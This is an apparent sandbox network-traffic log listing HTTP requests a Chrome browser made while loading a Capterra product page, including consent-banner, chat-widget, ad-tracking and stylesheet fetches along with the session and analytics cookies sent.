        Source: global trafficHTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/018fce69-2081-771f-b4c1-f49c8e55a112/en.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/37.b6614199.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/22.6b9a301a.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/202403.2.0/otBannerSdk.js HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ddm/fls/z/dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=*;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F HTTP/1.1Host: adservice.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8036043.fls.doubleclick.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /pagead/1p-user-list/1072635088/?random=1725034607177&cv=11&fst=1725033600000&bg=ffffff&guid=ON&async=1&gtm=45be48s0z876106154za201zb76106154&gcd=13t3t3t3t5l1&dma=0&tag_exp=0&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&hn=www.googleadservices.com&frm=0&tiba=Publicate%20Pricing%2C%20Alternatives%20%26%20More%202024%20%7C%20Capterra&npa=0&pscdl=noapi&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=ads_data_redaction%3Dfalse&rfmt=3&fmt=3&is_vtc=1&cid=CAQSKQDpaXnfreFr7UMJUwrxjcQQl0sATJa54prevAhrBa7LzEOEJMNWOgdD&random=2594997369&rmt_tld=0&ipr=y HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/43.7ac85d58.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCenterRounded.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCommonStyles.css HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.capterra.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /consent/989b7b21-d05b-49b3-9b8a-3dbec459287a/018fce69-2081-771f-b4c1-f49c8e55a112/en.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/50.de3b5864.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/11.639238ba.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /search HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034608.59.0.0
        Source: global trafficHTTP traffic detected: GET /core/assets/js/20.8c21ea18.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/42.f634da7c.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/29.31d09948.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/21.b8c41db9.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/26.04e7f30b.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/8.3f6aefd1.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/16.d215b579.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/14.e24a6190.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/18.9c1bd1fb.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /search/ HTTP/1.1Host: reviews.capterra.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://www.capterra.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034611.56.0.0; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1
        Source: global trafficHTTP traffic detected: GET /ddm/fls/z/dc_pre=CI_uo9mOnYgDFU1OpAQdGH4MHw;src=8036043;type=visit;cat=capte0;ord=8816183541542;npa=0;auiddc=*;ps=1;pcor=484373263;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132;uamb=0;uam=;uap=Windows;uapv=10.0.0;uaw=0;pscdl=noapi;frm=0;gtm=45fe48s0v9181622439z876106154za201zb76106154;gcs=G111;gcd=13t3t3t3t5l1;dma=0;tag_exp=0;epver=2;~oref=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F HTTP/1.1Host: adservice.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCenterRounded.json HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /scripttemplates/202403.2.0/assets/otCommonStyles.css HTTP/1.1Host: cdn.cookielaw.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/42.f634da7c.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/24.f9f5e493.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/21.b8c41db9.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/29.31d09948.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/17.17dea2aa.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.driftt.com/core/chat?d=1&region=US&driftEnableLog=false&pageLoadStartTime=1725034597937Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/50.de3b5864.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/8.3f6aefd1.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /core/assets/js/16.d215b579.chunk.js HTTP/1.1Host: js.driftt.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /_next/static/css/538d90e86755aff1.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; cf_clearance=4PlngkCPAy4lnZliT5r2g.x9qx2S0lCSc4BVNBjHhVI-1725034605-1.2.1.1-Uj5MaAYUZ_sR6Q8b5RImJsVonGbf9phGux67PmzwhqI8usnLTpHg2OdDWpmY1dHWvBfHi1dJ10nEilYQVhaVCpjWWuALurBEw4DBxol5qKigsFtYtlgzdDcH_2HPQRU9nSd9bj09SoLNbYYtOAxRFZxi8FI92wbK0pA_MaXkqpQNvATdPMNzMrt6gfRybqE_LAm0gaA1jf9DPrauEtJJivYbA8d7LXdCGo839pPsSSZlx64d1jgTE2O9UQQ5LwErWuJFkazxsIEdj9Bdu4aDF5RJuto1QWOVELXv9yuSDKFOeIVgS2AFo33ALiU5n.W2JuH1Wmjbs.vn0Fs7kINwluQJL0vBsuYnjBqF5QW99qFv9B0CSWGPt9dkHj5H4f55; _gid=GA1.2.849437591.1725034605; _capterra2_session=d9578f80036392cbe7d054555f3de48f; _gcl_au=1.1.1810143887.1725034608; _ga=GA1.1.1968510630.1725034605; OptanonConsent=isGpcEnabled=0&datestamp=Fri+Aug+30+2024+12%3A16%3A51+GMT-0400+(Eastern+Daylight+Time)&version=202403.2.0&browserGpcFlag=0&isIABGlobal=false&hosts=&consentId=e27a75a5-de1d-457f-a747-920e05970698&interactionCount=0&isAnonUser=1&landingPath=https%3A%2F%2Fwww.capterra.com%2Fp%2F145471%2FPublicate%2F&groups=C0007%3A1%2CC0004%3A1%2CC0002%3A1%2CC0003%3A1%2CC0001%3A1; utm=%7B%7D; lang=en; rx-sid=4a2a7960-9ed8-4374-809f-0a80cf9fe6be; _ga_M5DGBDHG2R=GS1.1.1725034607.1.0.1725034612.55.0.0
        Source: global trafficHTTP traffic detected: GET /_next/static/css/d1857e6f465dd807.css HTTP/1.1Host: reviews.capterra.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://reviews.capterra.com/search/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=DgAviE5NrWIOacSPhZ06rIgXoWumaFLCS70K33ZQgWk-1725034598-1.0.1.1-pnAE6aN37Q.cKX00Zyt72LoinovhYuQs5ezzjN4k9CFi5rVtlrAWTnXJjkBmksrYtBAuRTYJaDujIzEqSuzM6Q; _cfuvid=FURX91998Y9ROB2LKznik9Tt9vrpIYkoJDK0lFut7h8-1725034598236-0.0.1.1-604800000; 